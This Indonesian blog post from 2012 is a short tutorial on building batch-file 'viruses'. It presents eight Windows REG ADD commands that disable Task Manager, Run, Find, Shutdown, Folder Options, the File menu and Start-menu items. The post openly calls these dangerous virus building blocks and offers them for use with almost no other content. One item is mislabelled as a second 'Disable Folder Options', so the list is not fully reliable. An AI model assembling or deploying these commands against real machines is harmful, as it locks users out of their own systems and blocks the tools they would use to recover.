global variable

Jumat, 13 April 2012

Dasar membuat virus dengan CMD

·

dasar - dasar pembuatan virus CMD atau biasa di kenal dengan Virus
.Bat. Sebenarnya ini bukan virus sie!!! melainkan code - code script
biasa tapi bila di modifikasi dengan benar code tersebut dapat menjadi
sangat berbahaya, dan orang - orang menyebutnya VIRUS.. hehehe..

Baiklah mari kita lihat code - code di bawah ini berikut dengan penjelasan dan ke gunaannya :

1. Disable taks Manager / CTRL + ALT + DEL
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
 2. Disable Folder Options
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
3. Disable Run

REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v norun /t reg_dword /d 1 /f
4. Disable Find

REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nofind /t reg_dword /d 1 /f
5. Disable Start Menu List

reg ADD HKLM\Software\Microsoft\Windows\Currentversion\Policies\explorer /v Nostartmenupinnedlist /t reg_dword /d 1 /f
6. Disable Shutdown

REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v noclose /t reg_dword /d 1 /f
7. Disable File Menu

REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nofilemenu /t reg_dword /d 1 /f
8. Disable Folder Options

reg ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nostartmenumoreprograms /t reg_dword /d 1 /f

Tidak ada komentar:

Posting Komentar

handapeunpost